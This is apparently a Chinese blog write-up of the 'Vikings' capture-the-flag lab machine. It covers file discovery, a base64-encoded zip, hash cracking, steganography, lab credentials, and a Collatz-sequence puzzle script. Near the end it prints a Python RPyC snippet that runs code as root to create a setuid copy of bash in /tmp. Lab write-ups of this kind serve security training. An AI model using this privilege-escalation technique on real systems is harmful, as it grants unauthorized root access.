扫描打点

80看一下
site的内容,再扫一下,得到war.txt,提示去/war-is-over拿到一长串字符,扔到
cyberchef发现是用base64加密的zip
下下来看一下,有密码

先提取
hash爆破出来:
ragnarok123找到张图片,公式化看隐写找到里面有个压缩包:


拿到账密:
floki:f@m0usboatbuilde7
脑洞题横向

大概要横向到
Ragnar看起来需要
n=109时考拉兹猜想的序列转成可打印字符这里注意
ascii码中可打印字符范围在32-126所以只取这中间部分的序列:1
2
3
4
5
6
7
8
9
10
11
12def collatz(x):
result = [109]
while x != 1:
if x % 2 == 1:
x = (3 * x) + 1
else:
x = (x / 2)
if x <= 126 and x>=32:
result.append(int(x))
return result
print(collatz(109))解出来:

账密:
ragnar:mR)|>^/Gky[gz=\.F#j5P(rpyc提权这里注意有防火墙:即
wget和curl连不上这里要猜防火墙允许通过的端口号:这里是
80,还有可能是443或者53(DNS)看到这个:

注意那个
rpyc,查看官方文档监听
18812端口,发现开着:
根据文档,其允许客户端在服务器上执行任意
python代码这里可以让靶机连接自己,即
localhost,来以root运行命令,经典复制一下bash1
2
3
4
5
6
7import rpyc
connect = rpyc.classic.connect('localhost')
def rootshell():
import os
os.system('cp /bin/bash /tmp/rootshell && chmod +s /tmp/rootshell')
conn = connect.teleport(rootshell)
conn()
学长的任务罢了9-vikings
- 本文链接: http://noone40404.github.io/2024/12/07/学长的任务罢了9:vikings/
 - 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!